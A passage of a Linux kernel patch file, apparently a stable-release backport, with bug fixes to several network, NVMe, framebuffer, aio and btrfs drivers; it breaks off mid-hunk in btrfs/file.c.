+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -2256,6 +2256,30 @@ static void igb_enable_mas(struct igb_adapter *adapter)
+ 	}
+ }
+ 
++#ifdef CONFIG_IGB_HWMON
++/**
++ *  igb_set_i2c_bb - Init I2C interface
++ *  @hw: pointer to hardware structure
++ **/
++static void igb_set_i2c_bb(struct e1000_hw *hw)
++{
++	u32 ctrl_ext;
++	s32 i2cctl;
++
++	ctrl_ext = rd32(E1000_CTRL_EXT);
++	ctrl_ext |= E1000_CTRL_I2C_ENA;
++	wr32(E1000_CTRL_EXT, ctrl_ext);
++	wrfl();
++
++	i2cctl = rd32(E1000_I2CPARAMS);
++	i2cctl |= E1000_I2CBB_EN
++		| E1000_I2C_CLK_OE_N
++		| E1000_I2C_DATA_OE_N;
++	wr32(E1000_I2CPARAMS, i2cctl);
++	wrfl();
++}
++#endif
++
+ void igb_reset(struct igb_adapter *adapter)
+ {
+ 	struct pci_dev *pdev = adapter->pdev;
+@@ -2400,7 +2424,8 @@ void igb_reset(struct igb_adapter *adapter)
+ 			 * interface.
+ 			 */
+ 			if (adapter->ets)
+-				mac->ops.init_thermal_sensor_thresh(hw);
++				igb_set_i2c_bb(hw);
++			mac->ops.init_thermal_sensor_thresh(hw);
+ 		}
+ 	}
+ #endif
+@@ -3117,21 +3142,12 @@ static void igb_init_mas(struct igb_adapter *adapter)
+  **/
+ static s32 igb_init_i2c(struct igb_adapter *adapter)
+ {
+-	struct e1000_hw *hw = &adapter->hw;
+ 	s32 status = 0;
+-	s32 i2cctl;
+ 
+ 	/* I2C interface supported on i350 devices */
+ 	if (adapter->hw.mac.type != e1000_i350)
+ 		return 0;
+ 
+-	i2cctl = rd32(E1000_I2CPARAMS);
+-	i2cctl |= E1000_I2CBB_EN
+-		| E1000_I2C_CLK_OUT | E1000_I2C_CLK_OE_N
+-		| E1000_I2C_DATA_OUT | E1000_I2C_DATA_OE_N;
+-	wr32(E1000_I2CPARAMS, i2cctl);
+-	wrfl();
+-
+ 	/* Initialize the i2c bus which is controlled by the registers.
+ 	 * This bus will use the i2c_algo_bit structure that implements
+ 	 * the protocol through toggling of the 4 bits in the register.
+@@ -3521,6 +3537,12 @@ static int igb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			adapter->ets = true;
+ 		else
+ 			adapter->ets = false;
++		/* Only enable I2C bit banging if an external thermal
++		 * sensor is supported.
++		 */
++		if (adapter->ets)
++			igb_set_i2c_bb(hw);
++		hw->mac.ops.init_thermal_sensor_thresh(hw);
+ 		if (igb_sysfs_init(adapter))
+ 			dev_err(&pdev->dev,
+ 				"failed to allocate sysfs resources\n");
+@@ -6794,7 +6816,7 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 	struct timespec64 ts;
+ 	u32 tsauxc;
+ 
+-	if (pin < 0 || pin >= IGB_N_PEROUT)
++	if (pin < 0 || pin >= IGB_N_SDP)
+ 		return;
+ 
+ 	spin_lock(&adapter->tmreg_lock);
+@@ -6802,7 +6824,7 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 	if (hw->mac.type == e1000_82580 ||
+ 	    hw->mac.type == e1000_i354 ||
+ 	    hw->mac.type == e1000_i350) {
+-		s64 ns = timespec64_to_ns(&adapter->perout[pin].period);
++		s64 ns = timespec64_to_ns(&adapter->perout[tsintr_tt].period);
+ 		u32 systiml, systimh, level_mask, level, rem;
+ 		u64 systim, now;
+ 
+@@ -6850,8 +6872,8 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 		ts.tv_nsec = (u32)systim;
+ 		ts.tv_sec  = ((u32)(systim >> 32)) & 0xFF;
+ 	} else {
+-		ts = timespec64_add(adapter->perout[pin].start,
+-				    adapter->perout[pin].period);
++		ts = timespec64_add(adapter->perout[tsintr_tt].start,
++				    adapter->perout[tsintr_tt].period);
+ 	}
+ 
+ 	/* u32 conversion of tv_sec is safe until y2106 */
+@@ -6860,7 +6882,7 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 	tsauxc = rd32(E1000_TSAUXC);
+ 	tsauxc |= TSAUXC_EN_TT0;
+ 	wr32(E1000_TSAUXC, tsauxc);
+-	adapter->perout[pin].start = ts;
++	adapter->perout[tsintr_tt].start = ts;
+ 
+ 	spin_unlock(&adapter->tmreg_lock);
+ }
+@@ -6874,7 +6896,7 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 	struct ptp_clock_event event;
+ 	struct timespec64 ts;
+ 
+-	if (pin < 0 || pin >= IGB_N_EXTTS)
++	if (pin < 0 || pin >= IGB_N_SDP)
+ 		return;
+ 
+ 	if (hw->mac.type == e1000_82580 ||
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe.h b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
+index 5369a97ff5ec0..2bf387e52e202 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
+@@ -67,6 +67,8 @@
+ #define IXGBE_RXBUFFER_4K    4096
+ #define IXGBE_MAX_RXBUFFER  16384  /* largest size for a single descriptor */
+ 
++#define IXGBE_PKT_HDR_PAD   (ETH_HLEN + ETH_FCS_LEN + (VLAN_HLEN * 2))
++
+ /* Attempt to maximize the headroom available for incoming frames.  We
+  * use a 2K buffer for receives and need 1536/1534 to store the data for
+  * the frame.  This leaves us with 512 bytes of room.  From that we need
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 298cfbfcb7b6f..faf3a094ac540 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -6777,6 +6777,18 @@ static void ixgbe_free_all_rx_resources(struct ixgbe_adapter *adapter)
+ 			ixgbe_free_rx_resources(adapter->rx_ring[i]);
+ }
+ 
++/**
++ * ixgbe_max_xdp_frame_size - returns the maximum allowed frame size for XDP
++ * @adapter: device handle, pointer to adapter
++ */
++static int ixgbe_max_xdp_frame_size(struct ixgbe_adapter *adapter)
++{
++	if (PAGE_SIZE >= 8192 || adapter->flags2 & IXGBE_FLAG2_RX_LEGACY)
++		return IXGBE_RXBUFFER_2K;
++	else
++		return IXGBE_RXBUFFER_3K;
++}
++
+ /**
+  * ixgbe_change_mtu - Change the Maximum Transfer Unit
+  * @netdev: network interface device structure
+@@ -6788,18 +6800,12 @@ static int ixgbe_change_mtu(struct net_device *netdev, int new_mtu)
+ {
+ 	struct ixgbe_adapter *adapter = netdev_priv(netdev);
+ 
+-	if (adapter->xdp_prog) {
+-		int new_frame_size = new_mtu + ETH_HLEN + ETH_FCS_LEN +
+-				     VLAN_HLEN;
+-		int i;
+-
+-		for (i = 0; i < adapter->num_rx_queues; i++) {
+-			struct ixgbe_ring *ring = adapter->rx_ring[i];
++	if (ixgbe_enabled_xdp_adapter(adapter)) {
++		int new_frame_size = new_mtu + IXGBE_PKT_HDR_PAD;
+ 
+-			if (new_frame_size > ixgbe_rx_bufsz(ring)) {
+-				e_warn(probe, "Requested MTU size is not supported with XDP\n");
+-				return -EINVAL;
+-			}
++		if (new_frame_size > ixgbe_max_xdp_frame_size(adapter)) {
++			e_warn(probe, "Requested MTU size is not supported with XDP\n");
++			return -EINVAL;
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index 784ecb2dc9fbd..34ea8af48c3d0 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -595,8 +595,7 @@ mtk_foe_entry_commit_subflow(struct mtk_ppe *ppe, struct mtk_flow_entry *entry,
+ 	u32 ib1_mask = mtk_get_ib1_pkt_type_mask(ppe->eth) | MTK_FOE_IB1_UDP;
+ 	int type;
+ 
+-	flow_info = kzalloc(offsetof(struct mtk_flow_entry, l2_data.end),
+-			    GFP_ATOMIC);
++	flow_info = kzalloc(sizeof(*flow_info), GFP_ATOMIC);
+ 	if (!flow_info)
+ 		return;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.h b/drivers/net/ethernet/mediatek/mtk_ppe.h
+index a09c32539bcc9..e66283b1bc79e 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.h
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.h
+@@ -277,7 +277,6 @@ struct mtk_flow_entry {
+ 		struct {
+ 			struct mtk_flow_entry *base_flow;
+ 			struct hlist_node list;
+-			struct {} end;
+ 		} l2_data;
+ 	};
+ 	struct rhash_head node;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c
+index 835caa15d55ff..732774645c1a6 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c
+@@ -560,6 +560,8 @@ static int qcom_ethqos_probe(struct platform_device *pdev)
+ 	plat_dat->has_gmac4 = 1;
+ 	plat_dat->pmt = 1;
+ 	plat_dat->tso_en = of_property_read_bool(np, "snps,tso");
++	if (of_device_is_compatible(np, "qcom,qcs404-ethqos"))
++		plat_dat->rx_clk_runs_in_lpi = 1;
+ 
+ 	ret = stmmac_dvr_probe(&pdev->dev, plat_dat, &stmmac_res);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+index 413f660172199..e95d35f1e5a0c 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+@@ -541,9 +541,9 @@ int dwmac5_flex_pps_config(void __iomem *ioaddr, int index,
+ 		return 0;
+ 	}
+ 
+-	val |= PPSCMDx(index, 0x2);
+ 	val |= TRGTMODSELx(index, 0x2);
+ 	val |= PPSEN0;
++	writel(val, ioaddr + MAC_PPS_CONTROL);
+ 
+ 	writel(cfg->start.tv_sec, ioaddr + MAC_PPSx_TARGET_TIME_SEC(index));
+ 
+@@ -568,6 +568,7 @@ int dwmac5_flex_pps_config(void __iomem *ioaddr, int index,
+ 	writel(period - 1, ioaddr + MAC_PPSx_WIDTH(index));
+ 
+ 	/* Finally, activate it */
++	val |= PPSCMDx(index, 0x2);
+ 	writel(val, ioaddr + MAC_PPS_CONTROL);
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 4bba0444c764a..84e1740b12f1b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1077,7 +1077,8 @@ static void stmmac_mac_link_up(struct phylink_config *config,
+ 
+ 	stmmac_mac_set(priv, priv->ioaddr, true);
+ 	if (phy && priv->dma_cap.eee) {
+-		priv->eee_active = phy_init_eee(phy, 1) >= 0;
++		priv->eee_active =
++			phy_init_eee(phy, !priv->plat->rx_clk_runs_in_lpi) >= 0;
+ 		priv->eee_enabled = stmmac_eee_init(priv);
+ 		priv->tx_lpi_enabled = priv->eee_enabled;
+ 		stmmac_set_eee_pls(priv, priv->hw, true);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c
+index eb6d9cd8e93f8..0046a4ee6e641 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c
+@@ -559,7 +559,7 @@ stmmac_probe_config_dt(struct platform_device *pdev, u8 *mac)
+ 	dma_cfg->mixed_burst = of_property_read_bool(np, "snps,mixed-burst");
+ 
+ 	plat->force_thresh_dma_mode = of_property_read_bool(np, "snps,force_thresh_dma_mode");
+-	if (plat->force_thresh_dma_mode) {
++	if (plat->force_thresh_dma_mode && plat->force_sf_dma_mode) {
+ 		plat->force_sf_dma_mode = 0;
+ 		dev_warn(&pdev->dev,
+ 			 "force_sf_dma_mode is ignored if force_thresh_dma_mode is set.\n");
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 4ff1cfdb9730c..00911e9360525 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -500,7 +500,15 @@ static int am65_cpsw_nuss_common_stop(struct am65_cpsw_common *common)
+ 		k3_udma_glue_disable_tx_chn(common->tx_chns[i].tx_chn);
+ 	}
+ 
++	reinit_completion(&common->tdown_complete);
+ 	k3_udma_glue_tdown_rx_chn(common->rx_chns.rx_chn, true);
++
++	if (common->pdata.quirks & AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ) {
++		i = wait_for_completion_timeout(&common->tdown_complete, msecs_to_jiffies(1000));
++		if (!i)
++			dev_err(common->dev, "rx teardown timeout\n");
++	}
++
+ 	napi_disable(&common->napi_rx);
+ 
+ 	for (i = 0; i < AM65_CPSW_MAX_RX_FLOWS; i++)
+@@ -704,6 +712,8 @@ static int am65_cpsw_nuss_rx_packets(struct am65_cpsw_common *common,
+ 
+ 	if (cppi5_desc_is_tdcm(desc_dma)) {
+ 		dev_dbg(dev, "%s RX tdown flow: %u\n", __func__, flow_idx);
++		if (common->pdata.quirks & AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ)
++			complete(&common->tdown_complete);
+ 		return 0;
+ 	}
+ 
+@@ -2634,7 +2644,7 @@ static const struct am65_cpsw_pdata j721e_pdata = {
+ };
+ 
+ static const struct am65_cpsw_pdata am64x_cpswxg_pdata = {
+-	.quirks = 0,
++	.quirks = AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ,
+ 	.ale_dev_id = "am64-cpswxg",
+ 	.fdqring_mode = K3_RINGACC_RING_MODE_RING,
+ };
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.h b/drivers/net/ethernet/ti/am65-cpsw-nuss.h
+index 2c9850fdfcb6d..a9610e130cd8d 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.h
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.h
+@@ -86,6 +86,7 @@ struct am65_cpsw_rx_chn {
+ };
+ 
+ #define AM65_CPSW_QUIRK_I2027_NO_TX_CSUM BIT(0)
++#define AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ BIT(1)
+ 
+ struct am65_cpsw_pdata {
+ 	u32	quirks;
+diff --git a/drivers/net/usb/kalmia.c b/drivers/net/usb/kalmia.c
+index 9f2b70ef39aa1..613fc6910f148 100644
+--- a/drivers/net/usb/kalmia.c
++++ b/drivers/net/usb/kalmia.c
+@@ -65,8 +65,8 @@ kalmia_send_init_packet(struct usbnet *dev, u8 *init_msg, u8 init_msg_len,
+ 		init_msg, init_msg_len, &act_len, KALMIA_USB_TIMEOUT);
+ 	if (status != 0) {
+ 		netdev_err(dev->net,
+-			"Error sending init packet. Status %i, length %i\n",
+-			status, act_len);
++			"Error sending init packet. Status %i\n",
++			status);
+ 		return status;
+ 	}
+ 	else if (act_len != init_msg_len) {
+@@ -83,8 +83,8 @@ kalmia_send_init_packet(struct usbnet *dev, u8 *init_msg, u8 init_msg_len,
+ 
+ 	if (status != 0)
+ 		netdev_err(dev->net,
+-			"Error receiving init result. Status %i, length %i\n",
+-			status, act_len);
++			"Error receiving init result. Status %i\n",
++			status);
+ 	else if (act_len != expected_len)
+ 		netdev_err(dev->net, "Unexpected init result length: %i\n",
+ 			act_len);
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 56267c327f0b7..682987040ea82 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1546,31 +1546,6 @@ vmxnet3_rq_rx_complete(struct vmxnet3_rx_queue *rq,
+ 				rxd->len = rbi->len;
+ 			}
+ 
+-#ifdef VMXNET3_RSS
+-			if (rcd->rssType != VMXNET3_RCD_RSS_TYPE_NONE &&
+-			    (adapter->netdev->features & NETIF_F_RXHASH)) {
+-				enum pkt_hash_types hash_type;
+-
+-				switch (rcd->rssType) {
+-				case VMXNET3_RCD_RSS_TYPE_IPV4:
+-				case VMXNET3_RCD_RSS_TYPE_IPV6:
+-					hash_type = PKT_HASH_TYPE_L3;
+-					break;
+-				case VMXNET3_RCD_RSS_TYPE_TCPIPV4:
+-				case VMXNET3_RCD_RSS_TYPE_TCPIPV6:
+-				case VMXNET3_RCD_RSS_TYPE_UDPIPV4:
+-				case VMXNET3_RCD_RSS_TYPE_UDPIPV6:
+-					hash_type = PKT_HASH_TYPE_L4;
+-					break;
+-				default:
+-					hash_type = PKT_HASH_TYPE_L3;
+-					break;
+-				}
+-				skb_set_hash(ctx->skb,
+-					     le32_to_cpu(rcd->rssHash),
+-					     hash_type);
+-			}
+-#endif
+ 			skb_record_rx_queue(ctx->skb, rq->qid);
+ 			skb_put(ctx->skb, rcd->len);
+ 
+@@ -1653,6 +1628,31 @@ vmxnet3_rq_rx_complete(struct vmxnet3_rx_queue *rq,
+ 			u32 mtu = adapter->netdev->mtu;
+ 			skb->len += skb->data_len;
+ 
++#ifdef VMXNET3_RSS
++			if (rcd->rssType != VMXNET3_RCD_RSS_TYPE_NONE &&
++			    (adapter->netdev->features & NETIF_F_RXHASH)) {
++				enum pkt_hash_types hash_type;
++
++				switch (rcd->rssType) {
++				case VMXNET3_RCD_RSS_TYPE_IPV4:
++				case VMXNET3_RCD_RSS_TYPE_IPV6:
++					hash_type = PKT_HASH_TYPE_L3;
++					break;
++				case VMXNET3_RCD_RSS_TYPE_TCPIPV4:
++				case VMXNET3_RCD_RSS_TYPE_TCPIPV6:
++				case VMXNET3_RCD_RSS_TYPE_UDPIPV4:
++				case VMXNET3_RCD_RSS_TYPE_UDPIPV6:
++					hash_type = PKT_HASH_TYPE_L4;
++					break;
++				default:
++					hash_type = PKT_HASH_TYPE_L3;
++					break;
++				}
++				skb_set_hash(skb,
++					     le32_to_cpu(rcd->rssHash),
++					     hash_type);
++			}
++#endif
+ 			vmxnet3_rx_csum(adapter, skb,
+ 					(union Vmxnet3_GenericDesc *)rcd);
+ 			skb->protocol = eth_type_trans(skb, adapter->netdev);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 25ade4ce8e0a7..5acc9ae225df3 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4881,7 +4881,9 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ out_cleanup_admin_q:
+ 	blk_mq_destroy_queue(ctrl->admin_q);
+ out_free_tagset:
+-	blk_mq_free_tag_set(ctrl->admin_tagset);
++	blk_mq_free_tag_set(set);
++	ctrl->admin_q = NULL;
++	ctrl->fabrics_q = NULL;
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(nvme_alloc_admin_tag_set);
+@@ -4931,6 +4933,7 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 
+ out_free_tag_set:
+ 	blk_mq_free_tag_set(set);
++	ctrl->connect_q = NULL;
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(nvme_alloc_io_tag_set);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index d839689af17ce..778f94e9a4453 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -109,6 +109,7 @@ struct nvme_queue;
+ 
+ static void nvme_dev_disable(struct nvme_dev *dev, bool shutdown);
+ static bool __nvme_disable_io_queues(struct nvme_dev *dev, u8 opcode);
++static void nvme_update_attrs(struct nvme_dev *dev);
+ 
+ /*
+  * Represents an NVM Express device.  Each nvme_dev is a PCI function.
+@@ -1967,6 +1968,8 @@ static void nvme_map_cmb(struct nvme_dev *dev)
+ 	if ((dev->cmbsz & (NVME_CMBSZ_WDS | NVME_CMBSZ_RDS)) ==
+ 			(NVME_CMBSZ_WDS | NVME_CMBSZ_RDS))
+ 		pci_p2pmem_publish(pdev, true);
++
++	nvme_update_attrs(dev);
+ }
+ 
+ static int nvme_set_host_mem(struct nvme_dev *dev, u32 bits)
+@@ -2250,6 +2253,11 @@ static const struct attribute_group *nvme_pci_dev_attr_groups[] = {
+ 	NULL,
+ };
+ 
++static void nvme_update_attrs(struct nvme_dev *dev)
++{
++	sysfs_update_group(&dev->ctrl.device->kobj, &nvme_pci_dev_attrs_group);
++}
++
+ /*
+  * nirqs is the number of interrupts available for write and read
+  * queues. The core already reserved an interrupt for the admin queue.
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index 6f918e61b6aef..80383213b8828 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -1154,13 +1154,13 @@ static void nvme_rdma_error_recovery_work(struct work_struct *work)
+ 	struct nvme_rdma_ctrl *ctrl = container_of(work,
+ 			struct nvme_rdma_ctrl, err_work);
+ 
+-	nvme_auth_stop(&ctrl->ctrl);
+ 	nvme_stop_keep_alive(&ctrl->ctrl);
+ 	flush_work(&ctrl->ctrl.async_event_work);
+ 	nvme_rdma_teardown_io_queues(ctrl, false);
+ 	nvme_start_queues(&ctrl->ctrl);
+ 	nvme_rdma_teardown_admin_queue(ctrl, false);
+ 	nvme_start_admin_queue(&ctrl->ctrl);
++	nvme_auth_stop(&ctrl->ctrl);
+ 
+ 	if (!nvme_change_ctrl_state(&ctrl->ctrl, NVME_CTRL_CONNECTING)) {
+ 		/* state change failure is ok if we started ctrl delete */
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 4c052c261517e..1dc7c733c7e39 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -2128,7 +2128,6 @@ static void nvme_tcp_error_recovery_work(struct work_struct *work)
+ 				struct nvme_tcp_ctrl, err_work);
+ 	struct nvme_ctrl *ctrl = &tcp_ctrl->ctrl;
+ 
+-	nvme_auth_stop(ctrl);
+ 	nvme_stop_keep_alive(ctrl);
+ 	flush_work(&ctrl->async_event_work);
+ 	nvme_tcp_teardown_io_queues(ctrl, false);
+@@ -2136,6 +2135,7 @@ static void nvme_tcp_error_recovery_work(struct work_struct *work)
+ 	nvme_start_queues(ctrl);
+ 	nvme_tcp_teardown_admin_queue(ctrl, false);
+ 	nvme_start_admin_queue(ctrl);
++	nvme_auth_stop(ctrl);
+ 
+ 	if (!nvme_change_ctrl_state(ctrl, NVME_CTRL_CONNECTING)) {
+ 		/* state change failure is ok if we started ctrl delete */
+diff --git a/drivers/nvme/target/fc.c b/drivers/nvme/target/fc.c
+index ab2627e17bb97..1ab6601fdd5cf 100644
+--- a/drivers/nvme/target/fc.c
++++ b/drivers/nvme/target/fc.c
+@@ -1685,8 +1685,10 @@ nvmet_fc_ls_create_association(struct nvmet_fc_tgtport *tgtport,
+ 		else {
+ 			queue = nvmet_fc_alloc_target_queue(iod->assoc, 0,
+ 					be16_to_cpu(rqst->assoc_cmd.sqsize));
+-			if (!queue)
++			if (!queue) {
+ 				ret = VERR_QUEUE_ALLOC_FAIL;
++				nvmet_fc_tgt_a_put(iod->assoc);
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/of/of_reserved_mem.c b/drivers/of/of_reserved_mem.c
+index 65f3b02a0e4ed..f90975e004469 100644
+--- a/drivers/of/of_reserved_mem.c
++++ b/drivers/of/of_reserved_mem.c
+@@ -48,9 +48,10 @@ static int __init early_init_dt_alloc_reserved_memory_arch(phys_addr_t size,
+ 		err = memblock_mark_nomap(base, size);
+ 		if (err)
+ 			memblock_phys_free(base, size);
+-		kmemleak_ignore_phys(base);
+ 	}
+ 
++	kmemleak_ignore_phys(base);
++
+ 	return err;
+ }
+ 
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index f00995390fdfe..13802a3c3591d 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -1097,6 +1097,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_DATE, "05/07/2016"),
+ 		},
+ 	},
++	{
++		/* Chuwi Vi8 (CWI501) */
++		.driver_data = (void *)&chuwi_vi8_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "i86"),
++			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI.W86JLBNR01"),
++		},
++	},
+ 	{
+ 		/* Chuwi Vi8 (CWI506) */
+ 		.driver_data = (void *)&chuwi_vi8_data,
+diff --git a/drivers/vdpa/ifcvf/ifcvf_main.c b/drivers/vdpa/ifcvf/ifcvf_main.c
+index f9c0044c6442e..44b29289aa193 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_main.c
++++ b/drivers/vdpa/ifcvf/ifcvf_main.c
+@@ -849,7 +849,7 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ret = ifcvf_init_hw(vf, pdev);
+ 	if (ret) {
+ 		IFCVF_ERR(pdev, "Failed to init IFCVF hw\n");
+-		return ret;
++		goto err;
+ 	}
+ 
+ 	for (i = 0; i < vf->nr_vring; i++)
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index c730253ab85ce..583cbcf094467 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -313,7 +313,7 @@ void fb_deferred_io_open(struct fb_info *info,
+ }
+ EXPORT_SYMBOL_GPL(fb_deferred_io_open);
+ 
+-void fb_deferred_io_cleanup(struct fb_info *info)
++void fb_deferred_io_release(struct fb_info *info)
+ {
+ 	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 	struct page *page;
+@@ -327,6 +327,14 @@ void fb_deferred_io_cleanup(struct fb_info *info)
+ 		page = fb_deferred_io_page(info, i);
+ 		page->mapping = NULL;
+ 	}
++}
++EXPORT_SYMBOL_GPL(fb_deferred_io_release);
++
++void fb_deferred_io_cleanup(struct fb_info *info)
++{
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
++	fb_deferred_io_release(info);
+ 
+ 	kvfree(info->pagerefs);
+ 	mutex_destroy(&fbdefio->lock);
+diff --git a/drivers/video/fbdev/core/fbmem.c b/drivers/video/fbdev/core/fbmem.c
+index 1e70d8c676533..14ef3aab76630 100644
+--- a/drivers/video/fbdev/core/fbmem.c
++++ b/drivers/video/fbdev/core/fbmem.c
+@@ -1453,6 +1453,10 @@ __releases(&info->lock)
+ 	struct fb_info * const info = file->private_data;
+ 
+ 	lock_fb_info(info);
++#if IS_ENABLED(CONFIG_FB_DEFERRED_IO)
++	if (info->fbdefio)
++		fb_deferred_io_release(info);
++#endif
+ 	if (info->fbops->fb_release)
+ 		info->fbops->fb_release(info,1);
+ 	module_put(info->fbops->owner);
+diff --git a/fs/aio.c b/fs/aio.c
+index 562916d85cba8..e85ba0b77f596 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -361,6 +361,9 @@ static int aio_ring_mremap(struct vm_area_struct *vma)
+ 	spin_lock(&mm->ioctx_lock);
+ 	rcu_read_lock();
+ 	table = rcu_dereference(mm->ioctx_table);
++	if (!table)
++		goto out_unlock;
++
+ 	for (i = 0; i < table->nr; i++) {
+ 		struct kioctx *ctx;
+ 
+@@ -374,6 +377,7 @@ static int aio_ring_mremap(struct vm_area_struct *vma)
+ 		}
+ 	}
+ 
++out_unlock:
+ 	rcu_read_unlock();
+ 	spin_unlock(&mm->ioctx_lock);
+ 	return res;
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index acb3c5c3b0251..58785dc7080ad 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -3938,6 +3938,7 @@ int extent_fiemap(struct btrfs_inode *inode, struct fiemap_extent_info *fieinfo,
+ 	lockend = round_up(start + len, root->fs_info->sectorsize);
+ 	prev_extent_end = lockstart;
+ 
++	btrfs_inode_lock(&inode->vfs_inode, BTRFS_ILOCK_SHARED);
+ 	lock_extent(&inode->io_tree, lockstart, lockend, &cached_state);
+ 
+ 	ret = fiemap_find_last_extent_offset(inode, path, &last_extent_end);
+@@ -4129,6 +4130,7 @@ check_eof_delalloc:
+ 
+ out_unlock:
+ 	unlock_extent(&inode->io_tree, lockstart, lockend, &cached_state);
++	btrfs_inode_unlock(&inode->vfs_inode, BTRFS_ILOCK_SHARED);
+ out:
+ 	kfree(backref_cache);
+ 	btrfs_free_path(path);
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 23056d9914d84..1bda59c683602 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -31,329 +31,6 @@
+ #include "reflink.h"
+ #include "subpage.h"
+ 
+-static struct kmem_cache *btrfs_inode_defrag_cachep;
+-/*
+- * when auto defrag is enabled we
+- * queue up these defrag structs to remember which
+- * inodes need defragging passes
+- */
+-struct inode_defrag {
+-	struct rb_node rb_node;
+-	/* objectid */
